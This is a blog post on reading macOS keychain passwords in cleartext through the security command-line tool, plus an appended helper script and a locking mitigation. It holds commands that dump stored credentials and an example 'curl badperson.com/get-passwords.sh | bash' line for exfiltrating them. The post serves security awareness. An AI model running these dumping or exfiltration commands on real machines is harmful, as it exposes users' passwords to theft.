Dumping cleartext passwords from the OS X keychain


Most people know that you can get the cleartext password stored in the OS X “login” keychain by opening the “Keychain Access” app, navigating to the entry and entering your account’s password:

What I didn’t realize until recently is that this prompt is an artificial barrier put up by Apple that offers no real protection: the same password can be read from the command line without ever entering your account’s password. Let me demonstrate by first creating an example account:

Now we will retrieve the password in plaintext, without entering the account’s password, with the help of /usr/bin/security, which ships with every recent OS X release (the -g flag prints the password along with the item’s attributes):

$ /usr/bin/security \
    find-internet-password -g \
    -a timcook \
    -s security.apple.com

The only thing that stands between whoever has access to your terminal and the plaintext password is a single click on “Allow” in the access-confirmation dialog (the login keychain is unlocked whenever you are logged in, so no keychain password is asked for either):

keychain: "/Users/lucas/Library/Keychains/login.keychain"
class: "inet"
attributes:
    [...]
    "acct"="timcook"
    [...]
    "srvr"="security.apple.com"
password: ""

Bottom line is that, if you leave your Mac unlocked and unattended for even a few minutes, you can basically consider all your passwords compromised. For example, somebody could fire up a terminal and run

$ curl http://badperson.com/get-passwords.sh | bash

which could dump all your keychain’s passwords (one “Allow” click per entry) and post them back to the attacker’s server. This would take between 10 and 30 seconds depending on their typing speed.
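To make the record format above usable from a script, here is an added shell example that is not code from the original post. It parses the `keychain:/class:/attributes:/password:` records that /usr/bin/security prints into one tab-separated line per item, wraps the exact lookup used above, and adds one mitigation the post does not discuss (locking the login keychain on idle via `security set-keychain-settings`). The sample record, the password value in it and the `login.keychain` path are assumptions: the record is constructed in the real CLI format (`"acct"<blob>="…"`), and the path is the pre-10.12 name shown on the page.

```shell
#!/bin/sh
# Added example, not code from the original post. Parses security(1)
# records (the "keychain:/class:/attributes:/password:" block shown in
# the post) into "server<TAB>account<TAB>password" lines and wraps the
# two security(1) calls a practitioner would want next to that.

# parse_security_output: read security(1) records on stdin, print
# "<srvr>\t<acct>\t<password>" per record. Accepts both the abbreviated
# form on the page ("acct"="timcook") and the real CLI form
# ("acct"<blob>="timcook"); <NULL> values become empty fields.
parse_security_output() {
    awk '
        function qval(s,   i) {
            i = index(s, "=\"")
            if (i == 0) return ""          # e.g. "srvr"<blob>=<NULL>
            s = substr(s, i + 2)
            sub(/"$/, "", s)
            return s
        }
        /^keychain: /              { acct = ""; srvr = "" }   # new record
        /^[[:space:]]*"acct"/      { acct = qval($0) }
        /^[[:space:]]*"srvr"/      { srvr = qval($0) }
        /^password: "/             { pw = substr($0, 12); sub(/"$/, "", pw)
                                     print srvr "\t" acct "\t" pw }
    '
}

# dump_inet_password SERVER ACCOUNT (macOS only): the lookup from the post.
# -g writes the "password:" line to stderr, so both streams are merged
# before parsing. This pops the "Allow" dialog unless the item's ACL
# already trusts /usr/bin/security.
dump_inet_password() {
    /usr/bin/security find-internet-password -g -s "$1" -a "$2" 2>&1 \
        | parse_security_output
}

# lock_login_keychain_on_idle [SECONDS] (macOS only; added mitigation, not
# discussed in the post): lock the login keychain on sleep and after
# SECONDS idle (default 300). Once locked, the lookup above asks for the
# keychain password instead of a one-click "Allow". The path is the
# pre-10.12 name used on the page; newer systems use login.keychain-db.
lock_login_keychain_on_idle() {
    /usr/bin/security set-keychain-settings -l -u -t "${1:-300}" \
        "$HOME/Library/Keychains/login.keychain"
}

# Constructed sample record in the real CLI format (password is made up).
SAMPLE_RECORD='keychain: "/Users/lucas/Library/Keychains/login.keychain"
class: "inet"
attributes:
    0x00000007 <blob>="security.apple.com (timcook)"
    "acct"<blob>="timcook"
    "atyp"<blob>="form"
    "srvr"<blob>="security.apple.com"
password: "hunter2"'

# Demo on the constructed record; needs only awk, no macOS.
printf '%s\n' "$SAMPLE_RECORD" | parse_security_output
```

On a Mac, `dump_inet_password security.apple.com timcook` reproduces the post’s command and prints `security.apple.com<TAB>timcook<TAB>…` after the “Allow” click; `lock_login_keychain_on_idle 300` is the cheap countermeasure for the unattended-terminal case, at the cost of a keychain-password prompt after every five idle minutes. The parser assumes passwords contain no double quote, which is what the `-g` output format prints for plain text values.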

Note: I don’t really feel qualified to discuss whether there is a better way to handle this, because, you know, having to enter your password all the time sucks too. I just wanted to point out that whoever has access to your terminal can be considered to have access to all your passwords.

Let me know what you think!